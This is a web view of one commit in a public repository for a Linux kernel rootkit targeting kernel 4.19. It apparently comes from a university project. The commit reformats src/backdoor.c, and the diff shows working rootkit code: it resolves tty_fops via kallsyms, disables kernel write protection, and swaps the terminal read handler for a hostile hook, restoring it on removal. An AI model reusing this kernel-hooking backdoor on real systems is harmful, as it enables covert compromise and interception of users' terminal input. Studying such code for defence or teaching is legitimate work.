linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit f9b694a09a07a9ecc3c55a996086ed02df678eb6
parent 197578a53c0e3c75fb19346fa2e39c1884ed5935
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 30 Nov 2020 12:33:52 +0100

refactors code

Diffstat:

Msrc/backdoor.c | 9++++++---


1 file changed, 6 insertions(+), 3 deletions(-)

diff --git a/src/backdoor.c b/src/backdoor.c
@@ -23,10 +23,12 @@ void
 backdoor_tty(void)
 {
     if (!current_tty_read) {
-        current_tty_read = ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read;
+        current_tty_read
+            = ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read;
 
         disable_protection();
-        ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read = (void *)g7_tty_read;
+        ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read
+            = (void *)g7_tty_read;
         enable_protection();
     }
 }
@@ -38,7 +40,8 @@ unbackdoor(void)
 
     if (current_tty_read) {
         disable_protection();
-        ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read = (void *)current_tty_read;
+        ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read
+            = (void *)current_tty_read;
         enable_protection();
 
         while ((cur = atomic_read(&tty_read_count)) > 0) {